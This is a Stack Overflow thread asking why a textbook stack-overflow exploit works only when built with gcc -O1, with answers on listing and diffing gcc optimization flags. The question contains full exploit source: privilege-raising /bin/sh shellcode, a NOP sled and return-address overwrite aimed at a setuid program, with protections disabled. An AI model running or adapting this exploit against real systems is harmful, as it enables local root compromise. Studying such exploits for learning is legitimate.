5

While working on stack overflow exploits, I noticed that one of them only works when I compile it with '-O1'. To find out which option is responsible for the difference, I passed the individual options that -O1 is documented to enable by hand (taken from the documentation page for my version, which matches what man gcc says on my machine). With those options, however, the exploit again does not work.

The only other difference I noticed is the following warning, which appears only when compiling with -O1 and is probably not helpful:
exploit_notesearch.c:31:10: warning: ignoring return value of ‘system’, declared with attribute warn_unused_result [-Wunused-result].

Any ideas? Someone else pointed the difference out in an old SO question, but it remained unresolved.

Data:
- Ubuntu 12.04
- gcc 4.6.3.
- x86 32 bit
- a C program

Note: to get the overflow to work at all, I have already disabled every protection known to me that would prevent overflows (canaries, ASLR, execstack, stack alignment).

Code (probably irrelevant to the question). It calls another program, which I have not posted because I don't believe it matters (I will post it on request):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}
gnometorule
  • Did you read the resulting code, to see what the difference actually is? Also, even in scary exploit code, there's still [no reason to cast the return value of `malloc()` in C, so don't do that](http://stackoverflow.com/a/605858/28169). – unwind Nov 27 '13 at 15:25
  • @unwind: I started comparing, and the two are massively different (loops unrolled, no frame pointer, ...). To understand why this one works, though, I would need to understand why the other doesn't. There is no reason it shouldn't: (a) it's straight from a book (hence the ill-advised cast, which I didn't change); and (b) when I worked with the same code 2 weeks ago, it compiled and worked even without -O1 (the only update since then was installing gtk+). – gnometorule Nov 27 '13 at 15:36
  • @unwind: The only idea I had was that ebp (no longer used) is corrupted, so I compiled with -fno-frame-pointer. However, according to the man page that option is only honored in some circumstances, and I still had a frame pointer afterwards; so I can neither confirm that idea nor, apparently, reproduce it easily. – gnometorule Nov 27 '13 at 15:39
  • Note that compiling with `-S -fverbose-asm` flag will tell you more about what optimizations are enabled in a large comment block at the top of the resulting assembly file, in excruciating detail, actually. (The `-S` flag stops the compiler after generating assembly code, before assembling into an object.) – Joe Z Nov 27 '13 at 23:34
  • @Joe: that is very helpful. Among others, I had already assembled only (as you suggest), but didn't know this option. Does this flag tell you more than the -v option used when one-step-compiling? ( I had tried that one; not helpful for this case). Will try when back home. – gnometorule Nov 27 '13 at 23:44
  • @gnometorule: Here's a screen cap of what it output for one of my source files, to give you a sense: http://spatula-city.org/~im14u2c/images/compiler_output.png I assure you my command line to GCC was much, much shorter than that. I hadn't even heard of many of these. – Joe Z Nov 27 '13 at 23:56
  • I've closed this as a duplicate of the question you linked to, see [my answer](https://stackoverflow.com/a/48746895/981959) there for the explanation. – Jonathan Wakely Feb 12 '18 at 12:53

2 Answers

2

You can print out the optimisations that gcc actually uses by running

gcc -Q -O0 --help=optimizers

(or any other optimisation level instead of -O0).
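
To see what changes between two levels, rather than reading one long list, the two reports can be compared. A minimal sketch, assuming the report prints one flag per line followed by `[enabled]` or `[disabled]` (as GCC 4.x does); the helper names `enabled_flags` and `newly_enabled` and the file names are made up for this illustration:

```shell
#!/bin/sh
# Hypothetical helpers for illustration; they are not part of GCC.

# Read a `gcc -Q --help=optimizers` report on stdin and print the flags
# marked [enabled], one per line, sorted so that comm can consume them.
enabled_flags() {
    awk '$1 ~ /^-/ && $2 == "[enabled]" { print $1 }' | LC_ALL=C sort -u
}

# Print the flags that appear in the second sorted list but not the first.
newly_enabled() {
    LC_ALL=C comm -13 "$1" "$2"
}

# Intended use (needs gcc on the PATH; file names are arbitrary):
#   gcc -Q -O0 --help=optimizers | enabled_flags > O0.flags
#   gcc -Q -O1 --help=optimizers | enabled_flags > O1.flags
#   newly_enabled O0.flags O1.flags
```

Keep in mind that this only reports flag states. The GCC documentation states that most optimizations are disabled when no -O level is set, even if individual optimization flags are specified, so passing the reported flags by hand is not expected to reproduce -O1.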

creichen
  • Even when using all the flags listed as `Enabled` I can't reproduce the same speedup as `-O1` gives. Opened bug here: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=84327 – mxmlnkn Feb 12 '18 at 10:54
0

The man page description of what is incrementally enabled under -O1 is off in a number of ways (for a summary, see end of this answer).

Following the suggestion by @Joe Z (stop after generating assembly with -S, and add -fverbose-asm), the following options are enabled when no optimization level is given:

    # options enabled:  -fasynchronous-unwind-tables -fauto-inc-dec
    # -fbranch-count-reg -fcommon -fdelete-null-pointer-checks -fdwarf2-cfi-asm
    # -fearly-inlining -feliminate-unused-debug-types -ffunction-cse -fgcse-lm
    # -fident -finline-functions-called-once -fira-share-save-slots
    # -fira-share-spill-slots -fivopts -fkeep-static-consts
    # -fleading-underscore -fmath-errno -fmerge-debug-strings
    # -fmove-loop-invariants -fpcc-struct-return -fpeephole
    # -fprefetch-loop-arrays -fsched-critical-path-heuristic
    # -fsched-dep-count-heuristic -fsched-group-heuristic -fsched-interblock
    # -fsched-last-insn-heuristic -fsched-rank-heuristic -fsched-spec
    # -fsched-spec-insn-heuristic -fsched-stalled-insns-dep -fshow-column
    # -fsigned-zeros -fsplit-ivs-in-unroller -fstack-protector
    # -fstrict-volatile-bitfields -ftrapping-math -ftree-cselim -ftree-forwprop
    # -ftree-loop-if-convert -ftree-loop-im -ftree-loop-ivcanon
    # -ftree-loop-optimize -ftree-parallelize-loops= -ftree-phiprop -ftree-pta
    # -ftree-reassoc -ftree-scev-cprop -ftree-slp-vectorize
    # -ftree-vect-loop-version -funit-at-a-time -funwind-tables
    # -fvect-cost-model -fverbose-asm -fzero-initialized-in-bss -m32 -m80387
    # -m96bit-long-double -maccumulate-outgoing-args -malign-stringops
    # -mfancy-math-387 -mfp-ret-in-387 -mglibc -mieee-fp -mno-red-zone
    # -mno-sse4 -mpush-args -msahf -mtls-direct-seg-refs  

By and large, compiling with an explicit -O0 creates the same .s file. Running a diff between the .s file generated without optimizations and the one generated with -O1 yields these additional options (as printed by diff):

> -fcombine-stack-adjustments
> -fcompare-elim
> -fcprop-registers
> -fdefer-pop
> -fforward-propagate
> -fguess-branch-probability
> -fif-conversion
> -fif-conversion2
> -finline
> -fipa-profile
> -fipa-pure-const
> -fipa-reference
> -fmerge-constants
> -fomit-frame-pointer
> -fsplit-wide-types
> -ftoplevel-reorder
> -ftree-bit-ccp
> -ftree-ccp
> -ftree-ch
> -ftree-copy-prop
> -ftree-copyrename
> -ftree-dce
> -ftree-dominator-opts
> -ftree-dse  
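
The comparison above is easier to read when each `# options enabled:` block is first split into one option per line and sorted. A sketch, assuming the header layout shown earlier (an `# options enabled:` line followed by `#`-prefixed continuation lines); `asm_options` is a hypothetical helper name, and the file names in the usage comment are placeholders:

```shell
#!/bin/sh
# Hypothetical helper: print the options listed in the "# options enabled:"
# header of a .s file produced with -S -fverbose-asm, one per line, sorted.
asm_options() {
    awk '
        # Start of the block: drop the label but keep the line a comment.
        /^# options enabled:/ { grab = 1; sub(/^# options enabled:/, "#") }
        # The block ends at the first line that is not a comment.
        grab && !/^#/         { grab = 0 }
        # Inside the block, keep only tokens that look like options.
        grab {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^-/) print $i
        }
    ' "$1" | LC_ALL=C sort -u
}

# Intended use (file names are placeholders):
#   asm_options plain.s > plain.opts
#   asm_options o1.s    > o1.opts
#   diff plain.opts o1.opts
```

Sorting both lists the same way keeps diff from reporting options that merely moved to a different line of the header.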

For comparison, without having to look up the page, the man page says that -O1 enables:

-fauto-inc-dec 
-fcompare-elim 
-fcprop-registers 
-fdce 
-fdefer-pop 
-fdelayed-branch 
-fdse 
-fguess-branch-probability 
-fif-conversion2 
-fif-conversion 
-fipa-pure-const 
-fipa-profile 
-fipa-reference 
-fmerge-constants
-fsplit-wide-types 
-ftree-bit-ccp 
-ftree-builtin-call-dce 
-ftree-ccp 
-ftree-ch 
-ftree-copyrename 
-ftree-dce 
-ftree-dominator-opts 
-ftree-dse 
-ftree-forwprop 
-ftree-fre 
-ftree-phiprop 
-ftree-sra 
-ftree-pta 
-ftree-ter 
-funit-at-a-time  
-fomit-frame-pointer  

So, comparing the options the man page claims -O1 enables with what is actually enabled, there are these categories:

(1) those which actually are enabled by -O1 (e.g., -fcompare-elim)

(2) those already enabled under -O0 (e.g., -fauto-inc-dec)

(3) those which are enabled under neither -O0 nor -O1 (e.g., -fdce)

(4) those actually enabled by -O1 which are not mentioned on the -O1 list (e.g., -fcombine-stack-adjustments)

(note that -fdelayed-branch will only be enabled on architectures that support delayed branches, which mine doesn't; so it is a special case and not really missing)
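
The four categories can be computed mechanically once the three lists exist as files. A sketch, assuming each file holds one option per line with no trailing spaces and was sorted with `LC_ALL=C sort`; `classify_flags` and its argument order are invented for this illustration:

```shell
#!/bin/sh
# classify_flags O0_LIST O1_LIST MAN_LIST   (hypothetical helper)
# O0_LIST:  options enabled without optimization
# O1_LIST:  options enabled with -O1
# MAN_LIST: options the man page says -O1 enables
# Prints "<category> <option>" using the numbering from the text above.
classify_flags() {
    # (1) documented and really added by -O1
    LC_ALL=C comm -12 "$3" "$2" | LC_ALL=C comm -23 - "$1" | sed 's/^/1 /'
    # (2) documented but already enabled under -O0
    LC_ALL=C comm -12 "$3" "$1" | sed 's/^/2 /'
    # (3) documented but enabled under neither -O0 nor -O1
    LC_ALL=C comm -23 "$3" "$2" | LC_ALL=C comm -23 - "$1" | sed 's/^/3 /'
    # (4) added by -O1 but missing from the documented list
    LC_ALL=C comm -13 "$1" "$2" | LC_ALL=C comm -23 - "$3" | sed 's/^/4 /'
}
```

Called as `classify_flags O0.opts O1.opts man.opts` (placeholder file names), it prints one line per option, so the output can be filtered with grep for a single category.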

gnometorule
  • I realize there is significant overlap between the 'in' and 'out', and the exact content of what is added in -O1 needs careful reading of the diff output. – gnometorule Nov 28 '13 at 13:48
  • It might help to put each option on its own line before diffing (`sed 's/ /\n/g'` or whatever the `sed` syntax would be, after removing the `#`). – rubenvb Nov 28 '13 at 13:52
  • Split the lists of options into one option per line and sort each list, before diffing. – unwind Nov 28 '13 at 13:55
  • @rubenvb, unwind: good idea, will post shortly. – gnometorule Nov 28 '13 at 14:28